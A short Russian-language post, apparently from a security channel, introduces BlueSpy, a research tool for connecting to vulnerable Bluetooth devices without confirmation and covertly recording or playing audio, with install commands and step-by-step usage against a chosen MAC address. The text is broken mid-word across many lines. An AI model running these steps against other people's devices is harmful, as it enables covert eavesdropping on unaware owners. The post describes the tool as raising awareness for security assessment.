BlueSpy

Исследователи из Tarlogic Security представили BlueSpy, который позволяет незаметно подключаться к уязвимым Bluetooth и записывать/проигрывать звук без ведома владельца.
Утилита разработана с целью повышения осведомленности о небезопасном использовании устройств Bluetooth и необходимости разработки единой методологии для оценки безопасности.
Атака возможна из-за нарушений рекомендаций BSAM, особенно контроля BSAM-PA-05 —> устройства принимают соединения без подтверждения

Характеристика:
1??Перехват и анализ Bluetooth-трафика
2??Тестирование на уязвимости
3??Spoofing (подмена устройств)
4??Fuzzing (нагрузочное тестирова

ние)



Установка:

sudo apt install b

luez pulseaudio-utils

 (Для debian систем)

sudo pac

man -S bluez libpul

se (Для arch систем)

git clone https://github.com/Tarlogi

c

Security/B

lueSpy.git
cd BlueS

py



Использование:

sudo sy

stemctl start bluetooth з

апуск демона bluetooth

bluetoothctl

scan on

Ищем MAC который 

н

ам нужен

scan off

exit

pyth

on3 BlueSpy.py -a [MAC]